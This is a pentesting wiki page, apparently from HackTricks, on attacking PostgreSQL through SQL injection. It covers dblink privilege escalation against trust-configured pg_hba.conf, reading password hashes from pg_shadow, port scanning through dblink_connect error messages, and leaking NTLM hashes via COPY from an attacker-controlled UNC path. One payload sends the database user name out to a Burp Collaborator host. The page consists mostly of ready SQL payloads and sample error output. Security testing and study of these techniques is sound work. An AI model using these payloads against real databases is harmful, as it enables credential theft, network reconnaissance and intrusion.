network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md (6123B)
1 --- 2 title: "Network - Privilege Escalation, Port Scanning, and NTLM Challenge-Response Disclosure" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Network - Privilege Escalation, Port Scanning, and NTLM Challenge-Response Disclosure 14 15 **Find** [**more information about these attacks in the original paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).<sup>[[1]](#references)</sup> 16 17 Since **PostgreSQL 9.1**, registered extensions such as `dblink` can be installed with `CREATE EXTENSION` when the database role has the required privilege.<sup>[[5]](#references)[[6]](#references)</sup> 18 19 ```sql 20 CREATE EXTENSION dblink; 21 ``` 22 23 Once you have dblink loaded you could be able to perform some interesting tricks: 24 25 ### Privilege Escalation 26 27 The file `pg_hba.conf` can be misconfigured to trust local connections without a password. Rules are matched by connection type, address, database, and user; `local` applies to Unix-domain sockets, while `host ... 127.0.0.1/32 trust` applies to loopback TCP. A common Debian/Ubuntu versioned-cluster path is `/etc/postgresql/<major>/main/pg_hba.conf` (for example, `/etc/postgresql/12/main/pg_hba.conf`), but the active path should be confirmed with `SHOW hba_file;` when database access permits it.<sup>[[1]](#references)[[2]](#references)</sup> 28 29 ```text 30 local all all trust 31 ``` 32 33 _Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\ 34 _Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._ 35 36 This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database. 37 38 Another possible misconfiguration consist on something like this: 39 40 ```text 41 host all all 127.0.0.1/32 trust 42 ``` 43 44 As it will allow everybody from the localhost to connect to the database as any user.\ 45 In this case and if the **`dblink`** function is **working**, you could **escalate privileges** by connecting to the database through an already established connection and access data shouldn't be able to access: 46 47 ```sql 48 SELECT * FROM dblink('host=127.0.0.1 49 user=postgres 50 dbname=postgres', 51 'SELECT datname FROM pg_database') 52 RETURNS (result TEXT); 53 54 SELECT * FROM dblink('host=127.0.0.1 55 user=postgres 56 dbname=postgres', 57 'select usename, passwd from pg_shadow') 58 RETURNS (result1 TEXT, result2 TEXT); 59 ``` 60 61 ### Port Scanning 62 63 `dblink_connect` error differences can provide a crude port oracle. `dblink_connect_u()` permits non-superusers to use authentication methods that could expose server credentials, so its execution privilege is revoked from `PUBLIC` by default; it is useful only if a privileged administrator has granted access.<sup>[[1]](#references)[[3]](#references)</sup> 64 65 ```sql 66 SELECT * FROM dblink_connect('host=216.58.212.238 67 port=443 68 user=name 69 password=secret 70 dbname=abc 71 connect_timeout=10'); 72 //Different response 73 // Port closed 74 RROR: could not establish connection 75 DETAIL: could not connect to server: Connection refused 76 Is the server running on host "127.0.0.1" and accepting 77 TCP/IP connections on port 4444? 78 79 // Port Filtered/Timeout 80 ERROR: could not establish connection 81 DETAIL: timeout expired 82 83 // Accessing HTTP server 84 ERROR: could not establish connection 85 DETAIL: timeout expired 86 87 // Accessing HTTPS server 88 ERROR: could not establish connection 89 DETAIL: received invalid response to SSL negotiation: 90 ``` 91 92 Note that **before** being able to use `dblink_connect` or `dblink_connect_u` you may need to execute: 93 94 ```text 95 CREATE extension dblink; 96 ``` 97 98 ### UNC path - NTLM hash disclosure 99 100 On a Windows PostgreSQL server, a database-side file access to an attacker-controlled UNC path can cause the PostgreSQL service account to attempt SMB authentication. This requires a role permitted to perform the relevant server-side `COPY` operation and outbound SMB reachability.<sup>[[4]](#references)</sup> 101 102 ```sql 103 -- can be used to leak hashes to Responder/equivalent 104 CREATE TABLE test(); 105 COPY test FROM E'\\\\attacker-machine\\footestbar.txt'; 106 ``` 107 108 ```sql 109 -- to extract the value of user and send it to Burp Collaborator 110 CREATE TABLE test(retval text); 111 CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ 112 DECLARE sqlstring TEXT; 113 DECLARE userval TEXT; 114 BEGIN 115 SELECT INTO userval (SELECT user); 116 sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; 117 EXECUTE sqlstring; 118 END; 119 $$ LANGUAGE plpgsql SECURITY DEFINER; 120 SELECT testfunc(); 121 ``` 122 123 ## References 124 125 - [1] [Having Fun With PostgreSQL](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt) 126 - [2] [PostgreSQL documentation — Client authentication](https://www.postgresql.org/docs/current/auth-pg-hba-conf.html) 127 - [3] [PostgreSQL documentation — `dblink_connect_u`](https://www.postgresql.org/docs/current/contrib-dblink-connect-u.html) 128 - [4] [PostgreSQL documentation — `COPY`](https://www.postgresql.org/docs/current/sql-copy.html) 129 - [5] [PostgreSQL documentation — Additional supplied modules](https://www.postgresql.org/docs/current/contrib.html) 130 - [6] [PostgreSQL documentation — `CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html)